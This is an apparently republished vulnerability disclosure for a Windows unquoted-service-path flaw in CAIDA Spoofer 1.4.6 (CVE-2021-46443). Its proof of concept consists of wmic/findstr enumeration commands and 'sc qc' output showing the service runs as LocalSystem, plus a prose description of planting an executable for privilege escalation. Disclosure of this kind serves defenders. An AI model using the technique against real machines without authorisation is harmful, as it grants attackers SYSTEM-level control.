Below is a copy: Spoofer 1.4.6 Privilege Escalation / Unquoted Service Path
# Exploit Title: Spoofer 1.4.6 Local Privilege Escalation via Unquoted Service Path
# Date: 24/01/2022
# Exploit Author: Asim Sattar (@M_Asim_1)
# Vendor Homepage: https://www.caida.org/projects/spoofer/
# Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe
# Version: 1.4.6
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46443
Description:
-------------
Caida Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted
service path. Since this service is running as SYSTEM, this creates a local
privilege escalation vulnerability. To properly exploit this vulnerability,
a local attacker can insert an executable in the path of the service.
Rebooting the system or restarting the service will run the malicious
executable with elevated privileges.
------------------
Proof of Concept:
------------------
C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode |
findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Spoofer Scheduler spoofer-scheduler C:\Program Files
(x86)\Spoofer\spoofer-scheduler.exe Auto
C:\Users\asim.sattar>sc qc "spoofer-scheduler"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Spoofer\spoofer-scheduler.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spoofer Scheduler
DEPENDENCIES : tcpip
SERVICE_START_NAME : LocalSystem
Regards,
Asim Sattar
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum